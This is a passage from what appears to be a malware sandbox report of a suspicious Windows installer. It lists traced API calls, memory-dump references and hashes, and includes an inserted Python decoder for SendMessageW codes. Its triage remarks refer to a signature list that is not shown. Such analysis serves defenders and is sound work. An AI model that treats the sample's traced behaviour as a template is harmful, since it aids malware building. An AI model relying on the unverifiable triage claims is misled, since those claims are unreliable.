• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf

APIs
• ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
• EnableWindow.USER32(00000000,00000000), ref: 00401DFD
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$EnableShow

APIs
• GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C29
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C4B
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesCreate

APIs
• GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile

APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
• GetLastError.KERNEL32 ref: 0040570F
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateDirectoryErrorLast

APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PrivateProfileStringWrite

APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileWrite

APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileRead
                                                                                APIs
                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                • Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
                                                                                • Opcode Fuzzy Hash: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                • Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D
                                                                                APIs
                                                                                • SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: same ten .sdmp dumps (00400000 through 00453000) as listed in the preceding record
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                • Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
                                                                                • Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                • Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C
                                                                                APIs
                                                                                • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: same ten .sdmp dumps (00400000 through 00453000) as listed in the preceding record
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00403266
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: same ten .sdmp dumps (00400000 through 00453000) as listed in the preceding record
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: same ten .sdmp dumps (00400000 through 00453000) as listed in the preceding record
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                • Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
                                                                                • Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                • Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: same ten .sdmp dumps (00400000 through 00453000) as listed in the preceding record
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 1638840714-813528018
                                                                                • Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                • Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
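The SendMessageW entries in the record above are logged with raw message numbers, which is how the sandbox prints them. Read against the Windows SDK constants, the sequence (an image list created and attached with TVM_SETIMAGELIST, items inserted with TVM_INSERTITEMW, a combo box filled with CB_ADDSTRING, and a replacement window procedure at 00405123 installed through SetWindowLongW with index 0xFC, consistent with a sign-truncated GWL_WNDPROC = -4) is the scaffolding of an installer-style component-selection dialog rather than the code injection or PowerShell activity flagged in the signature list, so triage time is better spent on those records. The decoder below is an added example written for this page; it is not part of the Joe Sandbox report or its IDA plugin. It parses trace lines in the format printed above and maps each message number to its SDK name. The name table is restricted to constants the editor is certain of; any other number is reported as an offset from TV_FIRST or WM_USER rather than guessed, and a "?" in the message position (an argument the sandbox could not recover) is reported as unresolved. The sample input is constructed from the SendMessageW lines of the record above.

```python
import re

# Windows SDK message constants (winuser.h / commctrl.h) for the control
# families that appear in the SendMessageW calls of the record above.
WM_USER = 0x0400
TV_FIRST = 0x1100          # tree-view message base
MESSAGE_NAMES = {
    0x0000: "WM_NULL",
    0x0200: "WM_MOUSEMOVE",
    0x0143: "CB_ADDSTRING",
    0x0147: "CB_GETCURSEL",
    0x014E: "CB_SETCURSEL",
    0x0150: "CB_GETITEMDATA",
    0x0151: "CB_SETITEMDATA",
    TV_FIRST + 2:  "TVM_EXPAND",
    TV_FIRST + 9:  "TVM_SETIMAGELIST",
    TV_FIRST + 10: "TVM_GETNEXTITEM",
    TV_FIRST + 27: "TVM_SETITEMHEIGHT",
    TV_FIRST + 28: "TVM_GETITEMHEIGHT",
    TV_FIRST + 50: "TVM_INSERTITEMW",
    TV_FIRST + 63: "TVM_SETITEMW",
}

# One trace line as printed in the report: API.MODULE(arg,arg,...), ref: ADDR
LINE_RE = re.compile(
    r"SendMessageW\.USER32\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def message_name(msg):
    """Map a raw message number to its SDK name. Numbers not in the table are
    returned as base+offset so that nothing is guessed."""
    if msg in MESSAGE_NAMES:
        return MESSAGE_NAMES[msg]
    if msg >= TV_FIRST:
        return f"TV_FIRST+{msg - TV_FIRST:#x}"
    if msg >= WM_USER:
        return f"WM_USER+{msg - WM_USER:#x}"
    return f"WM_{msg:#06x}"


def decode_send_message(line):
    """Return (ref, raw_msg, name) for one SendMessageW trace line, or None
    for any other line. The sandbox prints '?' for arguments it could not
    recover; a '?' in the message position is reported as unresolved."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    if len(args) < 2:
        return None
    raw = args[1]
    if raw == "?":
        return (m.group("ref"), raw, "unresolved")
    return (m.group("ref"), raw, message_name(int(raw, 16)))


def decode_listing(text):
    """Decode every SendMessageW line in a block of report text, in order."""
    out = []
    for line in text.splitlines():
        d = decode_send_message(line)
        if d is not None:
            out.append(d)
    return out


# Constructed sample input: the SendMessageW lines copied from the record above.
SAMPLE = """\
• SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
• SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
"""

if __name__ == "__main__":
    for ref, raw, name in decode_listing(SAMPLE):
        print(f"{ref}  {raw}  {name}")
```

Running the block prints one decoded line per trace entry; the two WM_USER+0x19 and WM_USER+0x20 messages are left as offsets because their meaning depends on the control class of the target window, which the trace does not record.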
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                                                • lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
                                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 00404722
                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                                                  • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                  • Part of subcall function 004062E4: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                                                  • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                  • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                                                  • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: same ten .sdmp dumps (00400000 through 00453000) as listed in the preceding record
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: : Completed$A$C:\Users\user\AppData\Local\neoimpressionism
                                                                                • API String ID: 2624150263-3380217091
                                                                                • Opcode ID: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                • Opcode Fuzzy Hash: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\neoimpressionism\Vekselformular, xrefs: 00402154
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular
                                                                                • API String ID: 542301482-1797713023
                                                                                • Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                                                • Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p!C$p!C
                                                                                • API String ID: 0-3125587631
                                                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                • Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
                                                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                • Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                APIs
                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                • GetSysColor.USER32(?), ref: 00404391
                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
                                                                                • lstrlenW.KERNEL32(?), ref: 004043B2
                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040442D
                                                                                • SendMessageW.USER32(00000000), ref: 00404434
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040445F
                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
                                                                                • SetCursor.USER32(00000000), ref: 004044B3
                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
                                                                                • SetCursor.USER32(00000000), ref: 004044D7
                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
